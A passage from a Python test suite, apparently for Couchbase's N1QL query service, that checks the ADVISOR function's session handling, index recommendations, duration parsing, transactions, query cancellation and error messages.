results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Stop session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(stopped_session), server=self.master)
# List COMPLETED sessions
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status':'completed'}) as List", server=self.master)
all_sessions = dict()
for task in results['results'][0]['List']:
all_sessions[task['tasks_cache']['state']] = task['tasks_cache']['name']
self.assertEqual(len(all_sessions), 1)
self.assertEqual(all_sessions['completed'], completed_session)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_list_session_all(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '99h', 'query_count': 2 })", server=self.master)
active_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '50ms', 'query_count': 2 })", server=self.master)
completed_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1600m', 'query_count': 2 })", server=self.master)
stopped_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Stop session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(stopped_session), server=self.master)
# List ALL sessions
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status':'all'}) as List", server=self.master)
all_sessions = dict()
for task in results['results'][0]['List']:
all_sessions[task['tasks_cache']['state']] = task['tasks_cache']['name']
self.assertEqual(len(all_sessions), 3)
self.assertEqual(all_sessions['scheduled'], active_session)
self.assertEqual(all_sessions['cancelled'], stopped_session)
self.assertEqual(all_sessions['completed'], completed_session)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_start_session_duration_value(self):
durations = ['3600000000000ns','3600000000us','3600000ms','3600s','60m', '1h']
try:
for duration in durations:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'start', 'duration': '{0}'}})".format(duration), server=self.master)
session = start['results'][0]['$1']['session']
active = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
delay = active['results'][0]['List'][0]['tasks_cache']['delay']
self.assertEqual(delay, '1h0m0s')
abort = self.run_cbq_query(query="SELECT ADVISOR({{'action':'abort', 'session':'{0}'}}) as Abort".format(session), server=self.master)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_duration_completed(self):
durations = ['1800000000ns','1800000us','1800ms','1.8s','0.03m', '0.0005h']
try:
for duration in durations:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'start', 'duration': '{0}'}})".format(duration), server=self.master)
session = start['results'][0]['$1']['session']
self.sleep(3)
complete = self.run_cbq_query(query="SELECT ADVISOR({'action':'list','status':'completed'}) as List", server=self.master)
name = complete['results'][0]['List'][0]['tasks_cache']['name']
delay = complete['results'][0]['List'][0]['tasks_cache']['delay']
state = complete['results'][0]['List'][0]['tasks_cache']['state']
self.assertEqual(delay, '1.8s')
self.assertEqual(name, session)
self.assertEqual(state, "completed")
purge = self.run_cbq_query(query="SELECT ADVISOR({{'action':'purge', 'session':'{0}'}}) as Purge".format(session), server=self.master)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_response_below(self):
responses = ['100000000ns','100000us','100ms','0.1s', '0.000027h']
query1=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'lyon' AND country = 'France'"
query2=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'grenoble' AND country = 'France'"
query3=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'nice' AND country = 'France'"
try:
for response in responses:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'start', 'duration': '60s', 'response': '{0}'}})".format(response), server=self.master)
session = start['results'][0]['$1']['session']
results = self.run_cbq_query(query=query1, server=self.master)
results = self.run_cbq_query(query=query2, server=self.master)
results = self.run_cbq_query(query=query3, server=self.master)
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
run_count = get['results'][0]['Get'][0][0]['recommended_indexes'][0]['statements'][0]['run_count']
self.assertEqual(run_count, 1)
purge = self.run_cbq_query(query="SELECT ADVISOR({{'action':'purge', 'session':'{0}'}}) as Purge".format(session), server=self.master)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_response_above(self):
responses = ['9000000000000ns','9000000000us','9000000ms','9000s', '0.25h']
query1=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'lyon' AND country = 'France'"
query2=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'grenoble' AND country = 'France'"
query3=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'nice' AND country = 'France'"
try:
for response in responses:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'start', 'duration': '60s', 'response': '{0}'}})".format(response), server=self.master)
session = start['results'][0]['$1']['session']
results = self.run_cbq_query(query=query1, server=self.master)
results = self.run_cbq_query(query=query2, server=self.master)
results = self.run_cbq_query(query=query3, server=self.master)
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
advise = get['results'][0]['Get'][0]
self.assertEqual(advise, [[]])
purge = self.run_cbq_query(query="SELECT ADVISOR({{'action':'purge', 'session':'{0}'}}) as Purge".format(session), server=self.master)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_profile(self):
self.users = [{"id": "johnDoe", "name": "Jonathan Downing", "password": "password1"}]
self.create_users()
grant = self.run_cbq_query(query="GRANT {0} to {1}".format("admin", self.users[0]['id']),server=self.master)
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
query2=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "grenoble" AND country = "France"'
query3=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "nice" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'start', 'duration': '180s', 'profile': '{0}'}})".format(self.users[0]['id']), server=self.master)
session = start['results'][0]['$1']['session']
# Run query as other user
# results = self.curl_with_roles(query1)
# results = self.curl_with_roles(query1)
results = self.run_cbq_query(query=query1, username=self.users[0]['id'], password=self.users[0]['password'], server=self.master)
results = self.run_cbq_query(query=query1, username=self.users[0]['id'], password=self.users[0]['password'], server=self.master)
# run query as current user
results = self.run_cbq_query(query=query2, server=self.master)
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_all(self):
self.users = [{"id": "joaoDoe", "name": "Joao Downing", "password": "password1"}]
self.create_users()
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant = self.run_cbq_query(query=f"GRANT admin to {user_id}",server=self.master)
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
query2=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "grenoble" AND country = "France"'
query3=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "nice" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action':'start', 'duration':'40m', 'profile': '{0}', 'query_count':5, 'response':'50ms'}})".format(self.users[0]['id']), server=self.master)
session = start['results'][0]['$1']['session']
# Run query as other user
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
# Run query as current user
results = self.run_cbq_query(query=query2, server=self.master)
# Run query as other user
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
# Stop and get session
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
self.assertEqual(statement['run_count'], 5)
# Purge and list session
purge = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'purge', 'session':'{session}'}}) as Get", server=self.master)
list_all = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(list_all['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_cbo(self):
advise_index = "CREATE INDEX adv_lower_city_country_type ON `travel-sample`(lower(`city`),`country`) WHERE `type` = 'airport'"
advise_stats = "UPDATE STATISTICS FOR `travel-sample`(lower(`city`), `country`, `type`)"
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
# update stats to ensure CBO is used
stats = self.run_cbq_query(query=f"update statistics for `{self.bucket_name}`(type)", server=self.master)
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
results = self.run_cbq_query(query=query1, server=self.master)
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertEqual(index['index'], advise_index)
self.assertEqual(index['update_statistics'], advise_stats)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_query_txn(self):
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
close_txn = ['ROLLBACK WORK', 'COMMIT']
try:
for rollback_or_commit in close_txn:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in transaction
results = self.run_cbq_query(query="BEGIN WORK", server=self.master)
txid = results['results'][0]['txid']
results = self.run_cbq_query(query=query1, txnid=txid, server=self.master)
results = self.run_cbq_query(query=rollback_or_commit, txnid=txid, server=self.master)
# Stop and check session advise
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_txn(self):
results = self.run_cbq_query(query="BEGIN WORK", server=self.master)
txid = results['results'][0]['txid']
error = "advisor function is not supported within the transaction"
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m'})", txnid=txid, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_session_query_count(self):
query_lyon=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
query_grenoble=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "grenoble" AND country = "France"'
query_nice=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "nice" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m', 'query_count': 6})", server=self.master)
session = start['results'][0]['$1']['session']
# Run 9 queries
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
# Stop and check session advise. We should only see 6 queries count = 3*lyon + 2*grenoble + 1*nice
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
queries_count = dict()
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for query in index['statements']:
queries_count[query['statement']] = query['run_count']
self.assertEqual(queries_count[query_lyon], 3)
self.assertEqual(queries_count[query_grenoble], 2)
self.assertEqual(queries_count[query_nice], 1)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_skip_statement(self):
"""
Non advisabeable statement (explain, advise, select advisor, prepare, execute) should
not show in session.
"""
explain_query = 'EXPLAIN SELECT airportname FROM `travel-sample` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
advisor_list_query = "SELECT ADVISOR ({'action': 'list'})"
advise_query = 'ADVISE SELECT airportname FROM `travel-sample` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
prepare_query = 'PREPARE aeroport_de_lyon AS SELECT airportname FROM `travel-sample`.`inventory`.`airport` WHERE lower(city) = "lyon" AND country = "France"'
execute_prepared_query = 'EXECUTE aeroport_de_lyon'
# For prepare statement
self.run_cbq_query("CREATE PRIMARY INDEX ON `default`:`default`")
# Start session
start = self.run_cbq_query("SELECT ADVISOR({'action': 'start', 'duration': '45m'})")
session = start['results'][0]['$1']['session']
# Run queries. Explain, advisor, advise, prepare and execute should not show up in session advise.
self.run_cbq_query(explain_query)
self.run_cbq_query(advise_query)
self.run_cbq_query(advisor_list_query)
self.run_cbq_query(prepare_query)
self.run_cbq_query(execute_prepared_query)
# Stop and check session
self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop")
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get")
# Check there are no errors statement in advise session
advise = get['results'][0]['Get'][0][0]
self.assertEqual(advise, [])
def test_session_skip_count(self):
"""
Non advisabeable statement should
not be counted toward query_count.
Only query_lyon should be counted.
"""
advisor_list_query = "SELECT ADVISOR ({'action': 'list'})"
explain_query = 'EXPLAIN SELECT airportname FROM `travel-sample` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
advise_query = 'ADVISE SELECT airportname FROM `travel-sample` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
prepare_query = 'PREPARE aeroport_de_lyon AS SELECT airportname FROM `travel-sample`.`inventory`.`airport` WHERE lower(city) = "lyon" AND country = "France"'
execute_prepared_query = 'EXECUTE aeroport_de_lyon'
update_stats_query = 'UPDATE STATISTICS FOR `travel-sample`.inventory.airport(city)'
create_scope = "CREATE SCOPE `travel-sample`.scope1"
drop_scope = "DROP SCOPE `travel-sample`.scope1"
create_collection = "CREATE COLLECTION `travel-sample`.inventory.collection1"
drop_collection = "DROP COLLECTION `travel-sample`.inventory.collection1"
query_lyon='SELECT airportname FROM `travel-sample` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
# Start session
start = self.run_cbq_query("SELECT ADVISOR({'action': 'start', 'duration': '45m', 'query_count': 2})")
session = start['results'][0]['$1']['session']
# Run queries
self.run_cbq_query(advisor_list_query)
self.run_cbq_query(advisor_list_query)
self.run_cbq_query(prepare_query)
self.run_cbq_query(advise_query)
self.run_cbq_query(update_stats_query)
self.run_cbq_query(create_scope)
self.run_cbq_query(create_collection)
# First execution of query
self.run_cbq_query(query_lyon)
self.run_cbq_query(advisor_list_query)
self.run_cbq_query(execute_prepared_query)
self.run_cbq_query(explain_query)
self.run_cbq_query(drop_scope)
self.run_cbq_query(drop_collection)
# Second execution of query
self.run_cbq_query(query_lyon)
# Stop and check session
self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop")
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get")
# Check the query_lyon ran 2 times
advise = get['results'][0]['Get'][0][0]
statements = advise['recommended_covering_indexes'][0]['statements']
self.assertEqual(statements[0]['statement'], query_lyon)
self.assertEqual(statements[0]['run_count'], 2)
def test_get_active_session(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '5000s', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Get session
get = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'get', 'session': '{0}'}}) as Get".format(session), server=self.master)
self.assertEqual(get['results'][0]['Get'], [])
# Abort session
abort = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'abort', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(results['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_query_syntax_error(self):
query_syntax = f'SELECT airportname FROM `{self.bucket_name}` WERE type = \\"airport\\"'
error = "syntax error - line 1, column 53, near '`travel-sample` WERE', at: type"
try:
advise = self.run_cbq_query(query=f"SELECT ADVISOR(\"{query_syntax}\") as Advisor", server=self.master)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["error"], error)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["run_count"], 1)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["statement"], query_syntax.replace('\\',''))
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_invalid_arg(self):
query = "SELECT ADVISOR({'action': 'start', 'duration': '10s', 'invalid': 10});"
error_message = "Advisor: Invalid arguments."
error_code = 10503
try:
results = self.run_cbq_query(query=query, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error_message))
except CBQError as ex:
error = self.process_CBQE(ex)
self.assertEqual(error['code'], error_code)
self.assertEqual(error['msg'], error_message)
else:
self.fail("There were no errors. Error expected: {0}".format(error_message))
def test_negative_missing_arg(self):
query = "SELECT ADVISOR({'action': 'start', 'response': '10s'});"
error = "Error evaluating projection - cause: advisor() not valid argument for 'duration'"
try:
results = self.run_cbq_query(query=query, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_array(self):
query=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
error = "Number of arguments to function ADVISOR (near line 1, column 14) must be 1."
try:
results = self.run_cbq_query(query=f"SELECT ADVISOR('{query}','{query}')", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_invalid_value(self):
invalid_actions = [ \
{'cmd': {'action':'start', 'duration':'two'}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: time: invalid duration "two"'}, \
{'cmd': {'action':'start', 'duration':'1hr'}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: time: unknown unit "hr" in duration "1hr"'}, \
{'cmd': {'action':'start', 'duration':'1h', 'response':'nul'}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: time: invalid duration "nul"'}, \
{'cmd': {'action':'start', 'duration':'1h', 'response':'1sec'}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: time: unknown unit "sec" in duration "1sec"'}, \
{'cmd': {'action':'start', 'duration':'1h', 'query_count':'ten'}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: advisor() not valid argument for \'query_count\''}, \
{'cmd': {'action':'start', 'duration':'1h', 'profile':9999}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: advisor() not valid argument for \'profile\''} ]
for action in invalid_actions:
try:
self.run_cbq_query(query=f"SELECT ADVISOR({action['cmd']})", server=self.master)
self.fail(f"There were no errors. Error expected: {action['error_msg']}")
except CBQError as ex:
error = self.process_CBQE(ex)
self.assertEqual(error['code'], action['error_code'])
self.assertEqual(error['msg'], action['error_msg'] )
def test_negative_list(self):
error = "Error evaluating projection - cause: advisor() not valid argument for 'status'"
try:
session = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status':'stopped'})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_missing_session(self):
error = "Error evaluating projection - cause: advisor() not valid argument for 'session'"
try:
session = self.run_cbq_query(query="SELECT ADVISOR({'action':'get'})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_invalid_session(self):
error = "Error evaluating projection - cause: advisor() not valid argument for 'session'"
for action in ['get','purge','stop','abort']:
try:
session = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'{action}', 'session':123456}})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_from(self):
error_code = 3256
error_message = "FROM clause is not allowed when Advisor function is present in projection clause."
advisor_query = "select ADVISOR({'action':'list'}) FROM `trave-sample` WHERE city = 'Lyon'"
try:
self.run_cbq_query(advisor_query)
except CBQError as ex:
error = self.process_CBQE(ex)
self.assertEqual(error['code'], error_code)
self.assertEqual(error['msg'], error_message)
def run_async_query(self, query, username, password, server):
results = self.run_cbq_query(query=query, username=username, password=password, server=server)
# Check the query has been cancelled
self.assertEqual(results['status'], "stopped")
def test_session_query_cancel(self):
long_query = f"SELECT DISTINCT MIN(aport.airportname) AS Airport__Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `{self.bucket_name}` aport LEFT JOIN `travel-sample` lmark ON aport.city = lmark.city AND lmark.country = 'United States' AND lmark.type = 'landmark' WHERE aport.type = 'airport' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
self.users = [{"id": "jimDoe", "name": "Jim Downing", "password": "password1"}]
self.create_users()
role = "admin"
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant = self.run_cbq_query(query=f"GRANT {role} to {user_id}",server=self.master)
cancel_query = f"DELETE FROM system:active_requests WHERE users = '{user_id}'"
# Create index for join query
create_index = f"CREATE INDEX `def_city` ON `{self.bucket_name}`(`city`)"
results = self.run_cbq_query(query=create_index,server=self.master)
th = threading.Thread(target=self.run_async_query,args=(long_query, user_id, user_pwd, self.master))
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
session = start['results'][0]['$1']['session']
# Spawn query in a thread
th.start()
# Cancel query
self.sleep(1)
cancel = self.run_cbq_query(query=cancel_query,username=user_id, password=user_pwd, server=self.master)
th.join()
# Stop and get session advise
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], long_query)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_query_timeout(self):
long_query = f"SELECT DISTINCT MIN(aport.airportname) AS Airport__Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `{self.bucket_name}` aport LEFT JOIN `travel-sample` lmark ON aport.city = lmark.city AND lmark.country = 'United States' AND lmark.type = 'landmark' WHERE aport.type = 'airport' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
# Create index for join query
create_index = f"CREATE INDEX `def_city` ON `{self.bucket_name}`(`city`)"
results = self.run_cbq_query(query=create_index,server=self.master)
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
session = start['results'][0]['$1']['session']
try:
results = self.run_cbq_query(query=long_query, query_params={'timeout':'500ms'}, server=self.master)
except CBQError as ex:
self.assertTrue(str(ex).find("Timeout 500ms exceeded") > 0)
# Stop and get session advise
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], long_query)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_collection(self):
advise_index1 = "CREATE INDEX adv_lower_city_country ON `default`:`travel-sample`.`inventory`.`airport`(lower(`city`),`country`)"
advise_index2 = "CREATE INDEX adv_country_lower_city ON `default`:`travel-sample`.`inventory`.`airport`(`country`,lower(`city`))"
query1=f'SELECT airportname FROM `{self.bucket_name}`.inventory.airport WHERE lower(city) = "lyon" AND country = "France"'
self.wait_for_index_online(bucket='travel-sample', scope='inventory', collection='airport', index='def_inventory_airport_primary')
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
results = self.run_cbq_query(query=query1, server=self.master)
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_collection_context(self):
advise_index1 = "CREATE INDEX adv_lower_city_country ON `airport`(lower(`city`),`country`)"
advise_index2 = "CREATE INDEX adv_country_lower_city ON `airport`(`country`,lower(`city`))"
query1='SELECT airportname FROM airport WHERE lower(city) = "lyon" AND country = "France"'
query_contexts = ["", f"default:`{self.bucket_name}`.inventory", f"default:`{self.bucket_name}`._default"]
self.wait_for_index_online(bucket='travel-sample', scope='inventory', collection='airport', index='def_inventory_airport_primary')
for context in query_contexts:
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", query_context=context, server=self.master)
session = start['results'][0]['$1']['session']
# Run query in bucket.collection context
results = self.run_cbq_query(query=query1, query_context=f"default:`{self.bucket_name}`.inventory", server=self.master)
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", query_context=context, server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", query_context=context, server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_collection_join(self):
advise_index1 = "CREATE INDEX adv_country_city ON `default`:`travel-sample`.`inventory`.`landmark`(`country`,`city`)"
advise_index2 = "CREATE INDEX adv_city_country ON `default`:`travel-sample`.`inventory`.`landmark`(`city`,`country`)"
